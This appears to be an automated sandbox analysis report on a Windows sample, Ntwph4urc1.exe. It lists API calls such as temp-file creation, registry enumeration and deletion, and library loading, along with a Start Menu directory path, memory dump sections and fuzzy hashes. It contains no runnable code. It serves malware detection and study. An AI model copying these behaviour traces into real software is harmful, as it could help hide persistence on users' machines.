                                              • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 939 405f13-405f1f 940 405f20-405f54 GetTickCount GetTempFileNameW 939->940 941 405f63-405f65 940->941 942 405f56-405f58 940->942 944 405f5d-405f60 941->944 942->940 943 405f5a 942->943 943->944
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405F31
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Ntwph4urc1.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                              Strings
                                              • nsa, xrefs: 00405F20
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                              • "C:\Users\user\Desktop\Ntwph4urc1.exe", xrefs: 00405F13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-1052868259
                                              • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                              • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                              • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                              • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58

                                              Control-flow Graph (rendering not recoverable; legend: Executed / Not Executed): basic blocks 402e41-402f28, enumerating registry values and subkeys via RegEnumValueW and RegEnumKeyW, recursing into 402e41 for subkeys, then RegCloseKey and RegDeleteKeyW
                                              APIs
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseEnum$DeleteValue
                                              • String ID:
                                              • API String ID: 1354259210-0
                                              • Opcode ID: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                              • Instruction ID: 6d47fb934da24c9d717e5f7ce43986d94c12ea4066fa177ccbd406c8c521aae0
                                              • Opcode Fuzzy Hash: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                              • Instruction Fuzzy Hash: D1215A71500109BBDF129F90CE89EEF7A7DEB54348F110076F909B21A0E7B49E54AAA8

                                              Control-flow Graph (rendering not recoverable; legend: Executed / Not Executed): basic blocks 73f51777-73f518d8, calling internal subroutines (73f51b5f, 73f5239e, 73f523e0, 73f525b5, 73f515b4, 73f51272, 73f515c6, 73f52af8, 73f52770, 73f52d83, 73f52578, 73f5153d) together with GlobalFree and FreeLibrary
                                              APIs
                                                • Part of subcall function 73F51B5F: GlobalFree.KERNEL32(?), ref: 73F51DD4
                                                • Part of subcall function 73F51B5F: GlobalFree.KERNEL32(?), ref: 73F51DD9
                                                • Part of subcall function 73F51B5F: GlobalFree.KERNEL32(?), ref: 73F51DDE
                                              • GlobalFree.KERNEL32(00000000), ref: 73F51825
                                              • FreeLibrary.KERNEL32(?), ref: 73F518AB
                                              • GlobalFree.KERNELBASE(00000000), ref: 73F518D0
                                                • Part of subcall function 73F5239E: GlobalAlloc.KERNEL32(00000040,?), ref: 73F523CF
                                                • Part of subcall function 73F52770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73F517F6,00000000), ref: 73F52840
                                                • Part of subcall function 73F515C6: wsprintfW.USER32 ref: 73F515F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                              • String ID:
                                              • API String ID: 3962662361-3916222277
                                              • Opcode ID: e84af34dba3af4551a76097207dd20443275afeef33c2b7c69b4ac8cececa747
                                              • Instruction ID: 6c8554dc92ead92cd1fd53b547bc6c89b0029ba09e3587ffec020969132988cf
                                              • Opcode Fuzzy Hash: e84af34dba3af4551a76097207dd20443275afeef33c2b7c69b4ac8cececa747
                                              • Instruction Fuzzy Hash: FE41937240070AEBDF219F749D84B9A3BECBB043D1F184565FD0B9A1C6DB78A188C7A0
                                              APIs
                                                • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                • Part of subcall function 00405925: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,00000000,000000F0), ref: 0040164D
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00401640
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                              • API String ID: 1892508949-1275373446
                                              • Opcode ID: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                              • Instruction ID: df70cc4d1a75ed244d2a997ae4edf05539497ac8b3a7dfb8588bf84231242a1b
                                              • Opcode Fuzzy Hash: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                              • Instruction Fuzzy Hash: 2811E231504104EBCF206FA5CD4099F37B0EF25329B28493BEA11B12F1D63E4A819B5E
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,762323A0), ref: 004054B1
                                                • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402189
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
                                              • Opcode ID: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                              • Instruction ID: a0686faca365a727748c0602422b19a99e1e577425e3ae8133f46283b43b75e6
                                              • Opcode Fuzzy Hash: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                              • Instruction Fuzzy Hash: 63219671600104EBCF10AFA5CE49A9E7A71AF55358F70413BF515B91E0CBBD8E829A2E
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree
                                              • String ID: Call
                                              • API String ID: 3394109436-1824292864
                                              • Opcode ID: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                              • Instruction ID: 2334a48e4172ebb904b3f5af91f3a45bddc9a396230004d4704967bba2e99f69
                                              • Opcode Fuzzy Hash: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                              • Instruction Fuzzy Hash: 822162736001109BDB20AF64DDC495A73B4AB18328725453BF952F72D0C6B8A8508BAD
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402553
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID:
                                              • API String ID: 3356406503-0
                                              • Opcode ID: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                              • Instruction ID: ca3dd7d1b7a13d3c8a9a28b827632004175b2a1fd75c59dcebef83c1aa991e75
                                              • Opcode Fuzzy Hash: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                              • Instruction Fuzzy Hash: 00113AB1911219EBDF14DFA4DE589AEB774FF04354B20843BE402B62D0D7B88A44DB6E
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
• Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
• Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
• Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
APIs
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040244E
• RegCloseKey.ADVAPI32(00000000), ref: 00402457
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
Similarity
• API ID: CloseDeleteValue
• String ID:
• API String ID: 2831762973-0
• Opcode ID: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
• Instruction ID: b1f28ea4fe1f397702134e154a5d50ad3aafc71d487b2ad51b946e19fd30fa70
• Opcode Fuzzy Hash: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
• Instruction Fuzzy Hash: 3CF09672A00120ABDB10AFA89B4DAAE73B5AF45314F12443FF651B71C1DAFC5D01963E
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401EFC
• EnableWindow.USER32(00000000,00000000), ref: 00401F07
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
• Instruction ID: a2c3742fa11dc5cf357e4fc2c1b39d3237f925362780464401897514ce5169fc
• Opcode Fuzzy Hash: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
• Instruction Fuzzy Hash: 64E09A72A042009FD704EFA4AE488AEB3B4EB90325B20497FE401F20C1CBB85D00862E
APIs
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
